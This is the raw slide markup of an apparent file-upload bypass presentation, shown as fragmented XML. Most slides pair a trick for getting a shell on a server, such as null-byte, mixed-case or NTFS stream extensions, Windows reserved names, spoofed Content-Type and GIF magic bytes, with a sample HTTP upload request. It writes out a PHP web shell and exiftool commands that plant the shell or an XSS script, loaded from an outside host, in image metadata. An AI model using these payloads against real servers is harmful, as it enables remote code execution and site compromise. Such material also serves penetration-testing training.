              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php%00.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="645" name="Google Shape;645;p74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46" name="Google Shape;646;p74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74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648" name="Google Shape;648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74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Payloads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50" name="Google Shape;650;p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75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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Special Characters</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> With Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php…..</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>php%20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Get Shell On This server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656" name="Google Shape;656;p75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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php%20</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Google Shape;657;p75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58" name="Google Shape;658;p75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75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660" name="Google Shape;660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75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Payloads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62" name="Google Shape;662;p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76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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mix Uppercase and Lowercase</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Extensions e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pHp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pHP5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PhAr</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Get Shell On This server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668" name="Google Shape;668;p76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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.pHp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Google Shape;669;p76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70" name="Google Shape;670;p76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76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672" name="Google Shape;672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76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Payloads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74" name="Google Shape;674;p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77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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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NTFS Alternate Data Stream ADS </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. file.ext::$data. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file.ext:.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If Server Running On Windows To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Get Shell On This server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680" name="Google Shape;680;p77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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php::$data.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Google Shape;681;p77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82" name="Google Shape;682;p77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77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684" name="Google Shape;684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77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86" name="Google Shape;686;p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025" y="2675525"/>
            <a:ext cx="4210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78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200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload File Using Forbidden Names</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. CON </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PRN </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AUX </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> NUL </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> COM1-9 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT2 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT3 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT4 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT5 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT6 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT7 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT8 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>And</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LPT9</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> If Server Running On Windows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692" name="Google Shape;692;p78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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.COM5</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p78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94" name="Google Shape;694;p78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78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696" name="Google Shape;696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7" name="Google Shape;697;p78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98" name="Google Shape;698;p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025" y="2675525"/>
            <a:ext cx="4210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3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36" name="Google Shape;236;p43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43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38" name="Google Shape;238;p43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Encode Filename e.g. image.jpg%23.html</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get XSS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39" name="Google Shape;23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3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41" name="Google Shape;241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68575" y="2675525"/>
            <a:ext cx="4973700" cy="20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79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Change Content-Type To image/gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To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Get Shell On This server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704" name="Google Shape;704;p79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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.pHp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/gif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Content Of Shell Here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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="Google Shape;705;p79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06" name="Google Shape;706;p79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79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708" name="Google Shape;708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p79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Payloads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710" name="Google Shape;710;p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80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Change Content-Type To image/gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Magic Numbers Of GIF e.g. GIF87a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GIF8;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then Insert PHP Code To Get Shell On This server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716" name="Google Shape;716;p80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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file.php.gif</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>application/php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GIF87a &lt;?php echo shell_exec($_GET['cmd']); ?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p80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18" name="Google Shape;718;p80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80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720" name="Google Shape;720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80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Payloads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722" name="Google Shape;722;p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80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724" name="Google Shape;724;p8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2925" y="3073200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725" name="Google Shape;725;p80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726" name="Google Shape;726;p8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4025" y="3525200"/>
            <a:ext cx="4210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81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Generate shell Inside Image Metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. exiftool -Comment="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php echo shell_exec($_GET['cmd']); ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" img.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then Try To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload img.jpg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732" name="Google Shape;732;p81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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Open Your Terminal</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 -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Write This Command</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exiftool -Comment="&lt;?php echo shell_exec($_GET['cmd']); ?&gt;" img.jpg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3 -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Upload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> img.jpg </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To The Server</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;p81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34" name="Google Shape;734;p81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81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736" name="Google Shape;736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7" name="Google Shape;737;p81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738" name="Google Shape;738;p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025" y="2675525"/>
            <a:ext cx="4210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82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Generate XSS Inside Image Metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exiftool '-Caption-Abstract="&gt;&lt;script src="http://me.com/xss.js"id="boom"&gt;&lt;/script&gt;&lt;img s="' img.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Then </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Upload img.jpg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744" name="Google Shape;744;p82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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Open Your Terminal</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
